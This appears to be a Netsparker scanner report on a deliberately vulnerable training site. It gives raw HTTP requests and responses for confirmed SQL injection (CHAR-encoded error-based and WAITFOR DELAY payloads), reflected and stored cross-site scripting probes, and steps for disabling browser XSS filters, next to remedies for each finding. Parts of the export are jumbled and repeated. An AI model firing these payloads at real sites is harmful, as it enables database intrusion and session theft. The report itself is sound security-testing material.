[SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.4 /Make/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA…

Parameters
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR…

Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>

Request
GET /Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
    <head>
        <title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
        <meta name="viewport" content="width=device-width" />
        <style>
         body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…
    <body bgcolor="white">
            <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
            <h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
            <b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
            <br><br>
            <b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
            <b>Source Error:</b> <br><br>
            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code>
…e width=100% bgcolor="#ffffcc">
   <tr>
      <td>
          <code><pre>

[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
    </font>
    </body>
</html>
<!-- 
[SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.5 /Make/1 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA…

Parameters
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR…

Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>

Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
    <head>
        <title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
        <meta name="viewport" content="width=device-width" />
        <style>
         body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…
    <body bgcolor="white">
            <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
            <h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
            <b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
            <br><br>
            <b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
            <b>Source Error:</b> <br><br>
            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code>
…e width=100% bgcolor="#ffffcc">
   <tr>
      <td>
          <code><pre>

[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
    </font>
    </body>
</html>
<!-- 
[SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
TOTAL: 1 (IMPORTANT), CONFIRMED: 1

3. Cross-site Scripting
Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
- Hijacking user's active session
- Mounting phishing attacks
- Intercepting data and performing man-in-the-middle attacks

Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

Remedy References: Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet; OWASP AntiSamy Java
External References: XSS Cheat Sheet; OWASP - cross-site scripting; XSS Shell; XSS Tunnelling

Proof of Concept Notes
Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that:
XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used other than for testing purposes. Even though browsers have certain checks to prevent Cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism, therefore a web application should not rely on this kind of client-side browser checks.

Chrome
Open command prompt. Go to the folder where chrome.exe is located. Run the command: chrome.exe --args --disable-xss-auditor

Internet Explorer
Click Tools -> Internet Options and then navigate to the Security Tab. Click Custom level and scroll towards the bottom, where you will find that Enable XSS filter is currently Enabled. Set it to disabled. Click OK. Click Yes to accept the warning, followed by Apply.

Firefox
Go to about:config in the URL address bar. In the search field type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double clicking the row.

Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
3.1 /Search CONFIRMED
http://hackyourselffirst.troyhunt.com/Search?searchTerm='%2Bnetsparker(9)%2B'

Parameters
Parameter | Type | Value
searchTerm | GET | '+netsparker(9)+'

Request
GET /Search?searchTerm='%2Bnetsparker(9)%2B' HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response
…</section></div></div></div></div></header>
<div class="container">
  <section>
    <h2>You searched for &quot;<span id="searchTerm">'+netsparker(9)+'</span>&quot;</h2>
    <p class="alert alert-error">No results found for your search.</p>
  </section>
  <hr>
  <footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>
  $("#results tr").click(function () {
    var url = "/Supercar/" + $(this).attr("id");
    window.location.href = url;
  });
  $("#searchTerm").val(''+netsparker(9)+'');
</script>
<script>
  (function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
TOTAL: 1 (IMPORTANT), CONFIRMED: 1

4. Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted by HTML/JavaScript/VBScript within the browser.
Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.

Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- Users' session-sensitive information, such as cookies, can be stolen
- XSS can enable client-side worms, which could modify, delete or steal other users' data within the application
- The website can be redirected to a new location, defaced or used as a phishing site

Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti cross-site scripting libraries.

Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet; OWASP AntiSamy Java
External References: XSS Cheat Sheet; OWASP - Cross-site Scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08

4.1 /Supercar/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/3

Injection URL
http://hackyourselffirst.troyhunt.com/api/vote
Injection Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e

Identification Request
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response
…1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)…
19 57
1 TOTAL IMPORTANT, 1 CONFIRMED
5 Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.
Impact: If an attacker can intercept network traffic, he/she can steal users' credentials.
Actions to Take: 1. See the remedy for solution. 2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register CONFIRMED http://hackyourselffirst.troyhunt.com/Account/Register
Form target action: http://hackyourselffirst.troyhunt.com/Account/Register
1 TOTAL IMPORTANT, 1 CONFIRMED
6 Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.
This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.
Impact: This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
Actions to Take: 1. See the remedy for solution. 2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
Remedy: Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation: To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.
External References: .NET Cookie.Secure Property; How to Create Totally Secure Cookies
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 /Account/Login CONFIRMED https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie: AuthCookie
1 TOTAL IMPORTANT
7 Out-of-date Version (Microsoft SQL Server)
Netsparker identified you are using an out-of-date version of Microsoft SQL Server.
Impact: Since this is an old version of the software, it may be vulnerable to attacks.
Remedy: Please upgrade your installation of Microsoft SQL Server to the latest stable version.
Classification: OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310
7.1 /Make/1 http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Identified Version: 11.0.9222.17
Latest Version: 12.00.2000
Vulnerability Database: Result is based on 18/08/2014 vulnerability database content
Certainty
1 TOTAL MEDIUM, 1 CONFIRMED
8 Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.
Impact: If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing the action of the HTTP code to steal the user's password. Even though the target page is HTTPS, this does not protect the system against man-in-the-middle attacks.
This issue is important as it negates the use of SSL as a privacy protection barrier.
Actions to Take: 1. See the remedy for solution. 2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.
Remedy: All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification: OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
8.1 /Account/Login CONFIRMED http://hackyourselffirst.troyhunt.com/Account/Login
Form target action: https://hackyourselffirst.troyhunt.com/Account/Login
3 TOTAL MEDIUM
9 [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
Impact: There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks
Remedy: This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References: [ASP.NET] - Microsoft Anti-XSS Library; OWASP XSS Prevention Cheat Sheet
External References: XSS Cheat Sheet; OWASP - cross-site scripting; XSS Shell; XSS Tunnelling
Classification: OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
9.1 /api/vote http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter  Type  Value
userId  POST  1
supercarId  POST  3
comments  POST  '--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty
9.2 /api/admin http://hackyourselffirst.troyhunt.com/api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt
Parameters
Parameter  Type  Value
nsextt  GET  "--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes: Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
Certainty
1.4 /Make/2 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/2?orderby=1+WAITFOR+DELAY+%270%3a0%3a25%27--
Parameters
Parameter  Type  Value
orderby  GET  1 WAITFOR DELAY '0:0:25'--
1.5 /api/vote CONFIRMED http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter  Type  Value
userId  POST  1
supercarId  POST  3
comments  POST  ') WAITFOR DELAY '0:0:25'--
5 TOTAL CRITICAL, 5 CONFIRMED
2 SQL Injection
Netsparker identified an SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the backend database.
Impact: Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system
Actions to Take:
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.
Remedy: A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation: There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.
External References: OWASP SQL injection; SQL injection Cheatsheet
Remedy References: MSDN - Protect From SQL injection in ASP.NET
Classification: OWASP 2010-A1, OWASP 2013-A1, PCI V2.0-6.5.1, PCI V3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
2.1 /api/vote CONFIRMED http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter  Type  Value
userId  POST  1
supercarId  POST  3
comments  POST  (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+C
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 aug 20 2014 22:37:56 copyright (c) microsoft corporation
2.2 /Supercar/Leaderboard CONFIRMED http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2b
Parameters
Parameter  Type  Value
orderBy  GET  (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
asc  GET  false
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
RequestGET SupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
11 57
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14292
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.3 /Make/2 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter  Type  Value
orderby  GET  (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
